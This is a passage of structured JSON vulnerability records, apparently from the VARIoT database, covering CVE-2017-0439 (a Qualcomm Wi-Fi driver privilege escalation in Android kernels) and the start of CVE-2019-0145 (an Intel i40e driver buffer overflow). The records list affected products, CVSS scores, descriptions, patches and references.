      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0754",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 1.4,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd",
    "sources": [
      {
        "db": "BID",
        "id": "96047"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0439",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0439",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01581",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0439",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0439",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01581",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-295",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0439",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0439"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32450647. References: QC-CR#1092059. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0439"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0439",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96047",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0439",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0439"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "id": "VAR-201702-0754",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:41:36.337000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for QualcommWi-FiDriver Privilege Escalation Vulnerability (CNVD-2017-01581) for GoogleNexus/Pixel Products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89408"
      },
      {
        "title": "Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67579"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0439"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96047"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.codeaurora.org/out-bounds-write-wifi-driver-function-hddextscanpasspointfillnetworklist-cve-2017-0439"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0439"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0439"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0439"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0439"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0439"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "date": "2017-02-08T15:59:01.643000",
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01581"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0439"
      },
      {
        "date": "2017-03-07T00:02:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0439"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001488"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-295"
      }
    ],
    "trust": 0.6
  }
}

var-201911-1636
Vulnerability from variot

Buffer overflow in i40e driver for Intel(R) Ethernet 700 Series Controllers versions before 7.0 may allow an authenticated user to potentially enable an escalation of privilege via local access. Intel Ethernet 700 Series Controllers is a network adapter product from Intel Corporation. An attacker could use this vulnerability to achieve privilege elevation

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1636",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ethernet controller 710-bm1",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "intel",
        "version": "7.0"
      },
      {
        "model": "ethernet controller x710-at2",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "intel",
        "version": "7.0"
      },
      {
        "model": "ethernet controller x710-bm2",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "intel",
        "version": "7.0"
      },
      {
        "model": "ethernet controller x710-tm4",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "intel",
        "version": "7.0"
      },
      {
        "model": "ethernet controller xxv710-am1",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "intel",
        "version": "7.0"
      },
      {
        "model": "ethernet controller xxv710-am2",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "intel",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.244"
      },
      {
        "model": "ethernet 700 series software",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "intel",
        "version": "24.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.139"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.205"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "ethernet 700 series software",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ethernet series controller",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "intel",
        "version": "700\u003c7.0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ethernet_controller_x710-tm4_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "7.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ethernet_controller_x710-tm4:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ethernet_controller_x710-at2_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "7.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ethernet_controller_x710-at2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ethernet_controller_xxv710-am2_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "7.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ethernet_controller_xxv710-am2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ethernet_controller_xxv710-am1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "7.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ethernet_controller_xxv710-am1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ethernet_controller_x710-bm2_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "7.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ethernet_controller_x710-bm2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ethernet_controller_710-bm1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "7.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ethernet_controller_710-bm1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:intel:ethernet_700_series_software:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "24.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.2",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.244",
                "versionStartIncluding": "4.6",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.205",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.139",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      }
    ]
  },
  "cve": "CVE-2019-0145",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
